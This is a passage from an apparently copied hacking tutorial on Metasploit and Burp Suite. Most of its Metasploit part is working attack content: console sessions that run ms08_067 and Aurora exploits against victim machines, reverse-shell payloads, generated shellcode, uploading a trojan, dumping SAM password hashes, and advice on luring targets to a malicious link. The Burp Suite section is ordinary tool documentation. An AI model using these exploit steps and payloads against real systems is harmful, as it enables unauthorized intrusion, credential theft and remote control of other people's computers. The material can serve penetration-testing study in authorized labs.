Microsoft Corp. C:\WINDOWS\system32>

Passive Exploits Passive exploits wait for incoming hosts and exploit them as they connect. Passive exploits almost always focus on clients such as web browsers, FTP clients, etc. They can also be used in conjunction with email exploits, waiting for connections. Passive exploits report shells as they happen can be enumerated by passing '-l' to the sessions command. Passing '-i' will interact with a shell. msf exploit(ani_loadimage_chunksize) > sessions -l Active sessions ======Id Description Tunnel ------1 Meterpreter 192.168.1.101:52647 -> 192.168.1.104:4444 msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

Passive Exploit Example The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website. msf > use exploit/windows/browser/ani_loadimage_chunksize msf exploit(ani_loadimage_chunksize) > set URIPATH / URIPATH => / msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ani_loadimage_chunksize) > exploit

[*] Exploit running as background job. [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.101:8080/ [*] Server started. msf exploit(ani_loadimage_chunksize) > [*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.104:1077... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.104:1077... [*] Sending stage (240 bytes) [*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078) msf exploit(ani_loadimage_chunksize) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\victim\Desktop>

Using Exploits Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > help ...snip... Exploit Commands ======Command Description ------check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable rexploit Reloads the module and launches an exploit attempt msf exploit(ms08_067_netapi) > Using an exploit also adds more options to the 'show' command. msf exploit(ms03_026_dcom) > show targets Exploit targets: Id Name ------0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > show payloads Compatible payloads ======Name Description ------generic/debug_trap Generic x86 Debug Trap ...snip... msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ------RHOST 192.168.1.120 yes The target address RPORT 135 yes The target port Exploit target: Id Name ------0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > show advanced Module advanced options: Name : CHOST Current Setting: Description : The local client address Name : CPORT Current Setting: Description : The local client port ...snip... msf exploit(ms03_026_dcom) > show evasion Module evasion options: Name : DCERPC::fake_bind_multi Current Setting: true Description : Use multi-context bind calls ...snip

Metasploit Payloads There are three different types of payload module types in Metasploit: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged, is represented by '/' in the payload name. For example, "windows/shell_bind_tcp" is a single payload, with no stage whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).

Singles Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.

Stagers Stagers setup a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one when necessary. Windows NX vs NO-NX Stagers Reliability issue for NX CPUs and DEP NX stagers are bigger (VirtualAlloc) Default is now NX + Win7 compatible

Stages Stages are payload components that are downloaded by Stagers modules. The various payload stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone 'ipwn' Shell. Payload stages automatically use 'middle stagers' A single recv() fails with large payloads The stager receives the middle stager The middle stager then performs a full download Also better for RWX Payload Types Metasploit contains many different types of payloads, each serving a unique role within the framework. Let's take a brief look at the various types of payloads available and get an idea of when each type should be used. Inline (Non Staged) A single payload containing the exploit and full shell code for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However some exploits wont support the resulting size of these payloads.

Staged Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

Meterpreter Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required and Meterpreter development is very strong and constantly evolving.

PassiveX PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

NoNX The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent DEP.

Ord Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantages. The advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return address. They are also extremely tiny. However two very specific disadvantages make them not the default choice. The first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitation. The second being that it's a bit less stable than the other stagers. IPv6 The Metasploit IPv6 payloads, as the name indicates, are built to function over IPv6 networks.

Reflective DLL injection Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memory, never touching the host hard drive. The VNC and Meterpreter payloads both make use of reflective DLL injection. You can read more about this from Stephen Fewer, the creator of the reflective DLL injection method.

Metasploit Generating Payloads During exploit development, you will most certainly need to generate shellcode to use in your exploit. In Metasploit, payloads can be generated from within the msfconsole. When you 'use' a certain payload, Metasploit adds the 'generate' command. msf > use payload/windows/shell/bind_tcp msf payload(bind_tcp) > help ...snip... Payload Commands ======Command Description ------generate Generates a payload msf payload(bind_tcp) > generate -h Usage: generate [options] Generates a payload. OPTIONS: -b The list of characters to avoid: '\x00\xff' -e The name of the encoder module to use. -f The output file name (otherwise stdout) -h Help banner. -o A comma separated list of options in VAR=VAL format. -s NOP sled length. -t The output type: ruby, perl, c, or raw. To generate shellcode without any options, simply execute the 'generate' command. msf payload(bind_tcp) > generate # windows/shell/bind_tcp - 298 bytes (stage 1) # http://www.metasploit.com # EXITFUNC=thread, LPORT=4444, RHOST= buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" + "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" + "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" + "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" + "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" + "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" + "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" + "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" + "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" + "\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" + "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" + "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" + "\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" + "\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" + "\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" + "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" + "\xf6\x75\xec\xc3" ...snip...

About the Metasploit Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more. Metepreter was originally written by skape for Metasploit 2.x, common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.

How Meterpreter Works The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL. The Metepreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.

Meterpreter Design Goals "Stealthy" Meterpreter resides entirely in memory and writes nothing to disk. No new processes are created as Meterpreter injects itself into the compromised process and can migrate to other running processes easily. By default, Meterpreter uses encrypted communications. All of these provide limited forensic evidence and impact on the victim machine. "Powerful" Meterpreter utilizes a channelized communication system. The TLV protocol has few limitations. "Extensible" Features can be augmented at runtime and are loaded over the network. New features can be added to Meterpreter without having to rebuild it.

Adding Runtime Features New features are added to Meterpreter by loading extensions. The client uploads the DLL over the socket. The server running on the victim loads the DLL in-memory and initializes it. The new extension registers itself with the server. The client on the attackers machine loads the local extension API and can now call the extensions functions. This entire process is seamless and takes approximately 1 second to complete.

Metasploit Meterpreter Basics

Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help you get familiar with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren't covered, experimentation is the key to successful learning. help The 'help' command, as may be expected, displays the

Meterpreter help menu. meterpreter > help Core Commands ======Command Description ------? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... background

The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again. meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ps The 'ps' command displays a list of running processes on the target. meterpreter > ps Process list ======PID Name Path ------132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip...

migrate Using the 'migrate' post module, you can migrate to another process on the victim. meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > ls As in Linux, the 'ls' command will list the files in the current remote directory. meterpreter > ls Listing: C:\Documents and Settings\victim ======Mode Size Type Last modified Name ------40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip... download The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter >

'upload As with the 'download' command, you need to use double-slashes with the 'upload' command. meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe meterpreter > ipconfig The 'ipconfig' command displays the network interfaces and addresses on the remote machine. meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 meterpreter >

getuid Running 'getuid' will display the user that the Meterpreter server is running as on the host. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > execute The 'execute' command runs a command on the target. meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> shell The 'shell' command will present you with a standard shell on the target system. meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> idletime Running 'idletime' will display the number of seconds that the user at the remote machine has been idle. meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs meterpreter > hashdump The 'hashdump' post module will dump the contents of the SAM database. meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1 225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3c f52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c 089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01 502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de 7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb 3cf52d::: meterpreter > So, If have gone through the the commands and usage its that u have got something about the metasploit framework.

You must be eager to exploit but its worth mentioning auxiliaries.

When most people think of Metasploit, exploits come to mind. Exploits are cool, exploits get you shell, and exploits get all the attention. But sometimes you need something more than that. By definition, a Metasploit module that is not an exploit is an auxiliary module, which leaves a lot to the imagination.

In addition to providing valuable reconnaissance tools such as portscanners and service fingerprinters, auxiliary modules such as ssh_login can take a known list of usernames and passwords and then attempt to log in via brute force across an entire target network. Also included in the auxiliary modules are various protocol fuzzers such as ftp_pre_post,http_get_uri_long,smtp_fuzzer,ssh_version_corrupt, and more. You can launch these fuzzers at a target service in hopes of finding your own vulnerabilities to exploit. Just because auxiliary modules don’t have a payload, don’t think you won’t use them. But before we dive into their myriad uses, here’s an overview to help you see what we are dealing with.

There are many auxiliary but we will try to help you understand some basic, you are free to experiment with the msfconsole yourself.Because the help is comprehensive. Auxiliary modules are exciting because they can be used in so many ways for so many things. If you can’t find the perfect auxiliary module, it’s easy to modify one to suit your specific needs.

Consider a common example. Say you are conducting a remote penetration test, and upon scanning the network, you identify a number of web server and not much else. Your attack surface is limited at this point, and you have to work with what is available to you. Your auxiliary scanner/http modules will now prove extremely helpful as you look for low-hanging fruit against which you can launch an exploit. To search for all available HTTP scanners, run search scanner/http as shown here. You can see immediately that there are modules that you can use for subsequent exploration. Older versions of Microsoft IIS had a vulnerability in their WebDAV implementations that allowed for remote exploitation, so you could first run a scan against your targets in hopes of finding a server with WebDAV enabled, as follows.

See the ip address marked 2 is vulnerable.So it can be hacked.Cool isn’t it.So I think you have some idea about the auxiliary modules.

______It seems like you have some idea about how to use the exploits and auxiliaries.Lets have a Case study of attacking a System.

The materials have been copied from metasploit unleased and metasploit a penetration testers guide.

This is a case study which deals about hacking a Computer With just the IP Address.

First open netdiscover to discover the attacking machine on your network. You can do this by just running that command alone into terminal or get more detailed and run it like this netdiscover -i eth0 -r 192.168.0.1/24

with the output something like mine Now open up a Metasploit console typing in terminal msfconsole

Now we want to do a search for all exploits that have to do woth netapi so we run that serch with the command below search netapi

You'll want to run the exploit I highlited in this screenshot exploit/windows/smb/ms08_067_netapi

Now type show options to show all of the available options to set for this exploit show options

Now lets set our Remote Host "Machine we are attacking" ---->Victims PC set RHOST 192.168.0.101

Now we want to set the payload for the exploit by typing in the command below

set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the Local host which would be our machine ---> "The Attackers Machine "you" set LHOST 192.168.0.100 Last but not least we will type in the command below to begin exploiting the system exploit

Now you can use the meterpreter.Just look for the reference.

This attack is possible if the firewall is disabled in unpatched XP SP2 System.

Thanks to the guy called n1tr0g3n.

The Microsoft internet Explorer Exploit

In 2010 major companies like Google,Adobe,Symantec,Juniper Networks and others have been attacked by an exploit called Aurora.Metasploit framework has an exploit that uses the same technique of the famous Auroraand takes advantage a memory corruption flaw in Internet Explorer.

For this example we will test the exploit against a machine running Windows XP in order to see how it affects the Internet Explorer 6.So we are opening the metasploit framework and we are searching for the ms10_002 the Aurora exploit. Searching for the Aurora and use of the payload

For this attack as you can see and from the image above we have chosen as a payload the meterpreter reverse TCP.Next it is time to have a look at the available options of the exploit.

Analyzing the Options of Aurora Exploit

As we can see the default setting for the SRVHOST is 0.0.0.0: If we choose to leave it like that the web server will bind to all interfaces.The next option is the SRVPORT which is the port that the user needs to connect in order to trigger the exploit. By default the port is 8080 but we will use the port 80 for this example.We have the option also to set up the server for SSL connections but here we will not configure it.The next setting is theURIPATH which is not enabled by default.URIPATH is the URL that the victim will need to enter to trigger the vulnerability.We can use a custom URL or we can set this to slash (/).

For the payload settings we just need to configure the local port and the listen address.For this scenario we have chosen the port 443 and the IP address 192.168.1.1 which is our local address.The next image is showing the settings that we have made so far:

Setting the Aurora and the payload

Now that all the settings are correct it is time to use the command exploit in order to run the exploit.We will notice that it will start the web server in our local IP address.All we need now is to send the URL or the URI path if you prefer to our victims and to wait for someone to connect.For this scenario we have set the URI path as /so this means it will be only our IP address.

From the moment that someone opens the link the exploit will start the heap spray.The Internet explorer of the remote target will not respond for a while and the amount of memory will increased dramatically causing the system to act slowly.

The next image is showing how the Aurora exploit is opening a meterpreter session. Running the Aurora Exploit

Now we have a Meterpreter shell on the remote machine and we can start the session by using the commandsessions -i 1.However if the user closes the browser then we will lose our shell.In order to avoid that we can type the command in our meterpreter session run migrate and it will automatically migrates with another process of the system so we will keep our shell.

Starting the session and migration with another process

Additionally we can try to escalate privileges with the command getsystem and we can see the running processes of the remote system with the command ps.

Privilege Escalation Getsystem can be used to get system privilege.

Affected versions

Internet Explorer 6

Microsoft claims that it is also possible to affect Internet Explorer 7 and 8 but nobody so far have seen this exploit to work on these versions.

Conclusion

This was a client-side attack with the use of the famous exploit Aurora.Microsoft claims that affects and Internet Explorer 7 and 8 but from our testings against these versions we couldn’t get a shell.

The problem with this exploit is that it requires the user interaction in order to get a shell.The user must open an unknown link that will come from an unknown user so you need to workaround a method that will convince your targets.Also if the user closes the Web browser then the shell is lost.This means that we have to migrate the existing process to another process very fast.

I will try to get deep into metasploit and its working in the advanced sections. Go to offensive security for metasploit tutorials the idea here was to present the basic layout.

______

Chapter 3:Web Security:The Burp Suite and W3AF

What is Burp Suite?

Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All of the tools share the same robust framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility.

Burp Suite allows the individual tools to work together in highly effective ways, for instance:  A central site map is used to aggregate information gathered about target applications, and a centrally-defined target scope can be used to control the behaviour of individual tools.  Any HTTP request and response processed by any of the Burp tools can be selected for treatment by other tools. For example, a request from the Proxy history can be sent to Intruder to form the basis of a custom automated attack, to Repeater for a manual attack, to the Scanner for vulnerability analysis, or to Spider for automated content discovery.  Applications can be "passively" spidered without generating huge numbers of automated requests. All requests and responses passing through Burp Proxy are parsed for links and forms, and the site map is updated accordingly, allowing you to map sensitive applications in a non-intrusive manner, with full control over every request that is made.  Requests passing through the Proxy can be automatically scanned for security vulnerabilities while you are browsing (based on the defined target scope).  The IBurpExtender interface can be used to extend the functionality of Burp Suite and individual tools. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools.

Burp Suite tools

Burp Suite contains the following tools:

 Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the- middle between the end browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions.  Spider - an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality.  Scanner [Pro version only] - an advanced tool for performing automated discovery of security vulnerabilities in web applications.  Intruder - a highly configurable tool for automating customised attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities.  Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analysing the application's responses.  Sequencer - a tool for analysing the quality of randomness in an application's session tokens or other important data items which are intended to be unpredictable.  Decoder - a tool for performing manual or intelligent decoding and encoding of application data.  Comparer - a utility for performing a visual "diff" between any two items of data, normally pairs of related requests and responses.

Use the above links to read the detailed help specific to each of the individual Burp Suite tools. The remainder of this help describes some typical usage scenarios for Burp Suite and the shared functionality and configuration options that affect the behaviour of all of the Burp tools.

Using Burp Suite

When Burp Suite is launched, Burp Proxy is started by default on port 8080 of the local loopback interface. By setting a web browser to use this as its proxy server, all web traffic can be intercepted, inspected and modified. By default, requests for non-media resources are intercepted and displayed (this default behaviour can be modified using options within Burp Proxy). All web traffic passing through Burp Proxy is by default analysed and incorporated into the target site map, to build up a picture of the content and functionality of the applications visited. In Burp Suite Professional, all requests are by default passively analysed by Burp Scanner to identify a range of security vulnerabilities.

Before you begin work in earnest, you should ideally define the target scope for your work. The easiest way to do this is to browse to the application(s) you are targeting, then locate the relevant hosts or directories within the site map, and use the context menus to add URL paths to the scope. This central scope configuration can be used to control the behaviour of the individual Burp tools in various ways.

As you browse the target application, you can intercept requests and responses in the Proxy for manual editing, or you can turn interception off altogether. With interception off, a full history is still maintained of each request and response, and content still accumulates within the site map. As well as modifying intercepted messages within the Proxy, you can send these to other Burp tools to perform various actions, for example:

 You can send requests to Repeater, to manually fine tune an attack against the application, and reissue an individual request multiple times.  [Pro version] You can send requests to Scanner, to perform active or passive vulnerability scanning.  You can send requests to Intruder, to launch a custom automated attack to identify common vulnerabilities.  If you see a response containing a session token or other identifier that it intended to be unpredictable, you can pass this to Sequencer to test the randomness of the token.  Opaque data contained within any request or response can be sent to Decoder to perform a smart decode and identify any hidden information.  [Pro version] You can use various engagement tools to make your work faster and more effective.

You can also perform any of the above actions on items in the proxy history, on individual hosts, directories or files within the target site map, or from anywhere within any of the tools where requests and responses are displayed.

A central logging function can be used to record all requests and responses made by individual tools, or the entire suite. The tools can run in a single tabbed window, or be detached in individual windows. All tool and suite configuration is optionally persistent across program loads. In Burp Suite Professional, you can save the entire state of the component tools, to reload at a later stage and resume your work.

Burp menu

This menu contains a number of key functions and configuration options, which are described below. Search

[Pro version] Selecting "search" from the Burp menu opens a search dialog, which is very easy to use. You can specify the following search parameters:

 the expression to search for  whether the search is case sensitive  whether the search is simple text or regular expression  whether the search is restricted to in-scope items only  whether the search results should dynamically update as new HTTP messages are processed  which locations to search within HTTP messages (requests vs. responses, headers vs. body)  which tools to search in

When you click "go", the search begins, and the key details of each search match are shown in a sortable table, with a preview pane where you can see the full request and response, including highlighted matches for your search item. The usual context menus can be used to initiate attacks against specific items, or send them to other tools for further analysis: Note that if you initiate a search via the context menu within the target site map (as opposed to the Burp menu), then the search will be specific to the selected branch(es) of the site map.

Saving and restoring state

[Pro version] The help below describes the process of saving and restoring state, and some common usage scenarios for this functionality.

Saving state

The items that can be saved include:

 The target site map, which includes all of the content discovered via the Proxy and Spider.  The Proxy history.  The issues identified by the Scanner.  The contents and histories of the Repeater tabs.  The configuration of all suite tools.

Selecting "save state" from the Burp menu launches a wizard where you can define which items you want to save the state and configuration of: You then choose your output file, and Burp does the rest. You can continue using Burp while its state is being saved - you may experience some brief delays if you try to perform an operation on data which Burp is in the process of saving, to prevent any data corruption. Obviously, because the save file includes the requests and responses accumulated within the tools you are saving, this file can grow very large. In practice, a few hours' testing will typically save or restore in a minute or two. You can make this process leaner and quicker by deleting unneeded items from the site map and proxy history before performing a save.

Restoring state

Selecting "restore state" from the Burp menu launches a wizard where you can define which items you want to restore the state and configuration of. The first step is to select a file which you previously saved. Burp then analyses this file to identify all of its contents (remember that each save file can include the state and configuration for any combinations of tools). For each type of saved state and configuration, Burp lets you choose whether you want to restore it, and if so whether to add to or replace the tool's existing state:

Burp then goes to work and restores everything you have selected. You can continue using Burp while its state is being restored - you may experience some brief delays if you try to perform an operation on data which Burp is in the process of restoring, to prevent any data corruption.

Usage scenarios

The ability to save and restore tool state and configuration is of huge benefit to penetration testers:

 You can save your work at the end of each day and seamlessly resume it the next morning.  You can back up key test information throughout a job, in case of system crashes.  At the end of an engagement, you can store a full archive of all accumulated information, enabling you to re-open your work at a later point, to answer a client question or re-test a fixed issue.  The task of mapping out an application's content can be divided up between consultants, and the resulting site maps can be merged incrementally into one, for all consultants to share.  Team leaders can optimise Burp's configuration for a particular engagement, including fine-grained target scope definition, and pass this configuration straight to other team members to begin testing.  You can create configuration templates designed for different kinds of task, save these for future use, and switch between them easily. Remembering settings

The "remember settings" options determine whether Burp Suite will remember configuration settings across different loads of the software. You can tell Burp to remember settings for all tools, or for individually selected tools.

The "restore defaults" options reset all configuration settings within Burp Suite or individual tools to their default values.

Lean mode

If this option is selected, then the next time Burp Suite starts, it will run in a "lean" mode in which the only tools available are Burp Proxy, Intruder and Repeater. Running in this mode creates a smaller impact on system resources and is designed for users who prefer a more simple lightweight tool.

Target site map

The central site map aggregates all of the information which Burp has gathered about the application you are attacking. This includes all of the resources which have been directly requested via the Proxy, any items which have been inferred by analysing the responses to those requests, and all content discovered using the Spider. When you begin browsing a typical application, a large amount of content will be mapped out for you before you even get as far as requesting it, for example: Items that have been requested are shown in black; those which Burp has inferred but not yet requested are shown in grey. By default, items that are typically uninteresting to penetration testers are filtered from the display, but this behaviour can be modified (described below).

The site map interface works essentially like a graphical email client. A tree view of hosts and directories is shown on the left. Selecting one or more nodes in the tree view causes all of the items below these nodes to be shown in table form on the top right. This table includes the key detail about each item (URL, status code, page title, etc.) and allows the items to be sorted according to any column (click any column heading to sort descending, or shift-click to sort ascending). Selecting an item in the table causes the request and response for that item to show in a preview pane on the bottom right. This preview pane contains all of the functions familiar from elsewhere in Burp - analysis of headers and parameters, text search, media rendering, etc.

As well as displaying all of the information gathered about your target, the site map enables you to control and initiate specific attacks against it, using the context menus that appear everywhere. For example, you can select a host or folder within the tree view, and perform actions on the entire branch of the tree, such as spidering or scanning:

Similarly, you can select an individual file within the tree or table, and send the associated request to other tools, such as Intruder or Repeater. If the item has not yet been requested by your browser, Burp will construct a default request for the item, based on the URL and any cookies received from the target domain: [Pro version] You can use the context menu to access various engagement tools, such as searching for comments and scripts, analysing your target web site, scheduling tasks, etc.

In the table view, you can annotate individual or multiple items, by adding comments and highlights: You can highlight individual items using a drop-down menu on the left-most table column:

And you can comment individual items in-place by double-clicking and editing the table cell: Alternatively, if you want to annotate several items at once, you select the relevant items and use the context menu to add comments or apply highlights:

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later. The content displayed within the site map is effectively a view into an underlying database, and you can configure filters to determine which items of underlying data are displayed within the map. Some applications contain a large amount of content like images, CSS, etc., which it is normally helpful to hide from view. At the top of the site map, there is a filter bar. Clicking on this shows a popup enabling you to configure exactly what content will be displayed within the map:

You can choose to display only requests with parameters, or which are within the current target scope. You can filter by MIME type, HTTP status code and file extension. If you set a filter to hide some items, these are not deleted, only hidden, and will reappear if you unset the relevant filter. This means you can use the filter to help you systematically examine a complex site map to understand where different kinds of interesting content reside.

[Pro version] You can also specify a search term to filter on, which will only show items containing that expression in the request or response, or within the user-added comment if applicable.

In addition to filtering content from view, you may sometimes want to delete it altogether. For example, if you have browsed to off-target domains, you will have accumulated data within Burp that you just don't need. In this situation, you can permanently delete the superfluous items using the context menus within the site map. For example, you can select multiple hosts or folders within the tree or table views and delete them altogether: Comparing site maps

You can use Burp to compare two site maps and highlight differences. This feature can be used in various ways to help find different types of access control vulnerabilities, and identify which areas of a large application warrant close manual inspection. Some typical use-cases for this functionality are as follows:

 You can map the application using accounts with different privilege levels, and compare the results to identify functionality that is visible to one user but not the other.  You can map the application using a high-privileged account, and then re-request the entire site map using a low-privileged account, to identify whether access to privileged functions is properly controlled.  You can map the application using two different accounts of the same type, to identify cases where user-specific identifiers are used to access sensitive resources, and determine whether per-user data is properly segregated.

You can access the "compare site maps" feature using the context menu on the main site map. This opens a wizard that lets you configure the details of the site maps you want to compare, and how the comparison should be done. When selecting the site maps you want to compare, the following options are available:

 The current site map that appears in Burp's target tab.  A site map loaded from a Burp state file that you saved earlier.  Either of the above, re-requested in a different session context. You can choose to include all of the site map's contents, or you can restrict only to selected or in-scope items. If you choose to re-request a site map in a different session context, it is particularly important not to include requests that might disrupt that context - for example, login, logout, user impersonation functions, etc.

To perform the comparison, Burp works through each request in the first site map, and matches this with a request in the second site map, and vice versa. The responses to matched requests are then compared to identify any differences. Any unmatched items in either site map are flagged as deleted or added, respectively. The exact process by which this is done is highly configurable, allowing you to tailor the comparison to features of the target application.

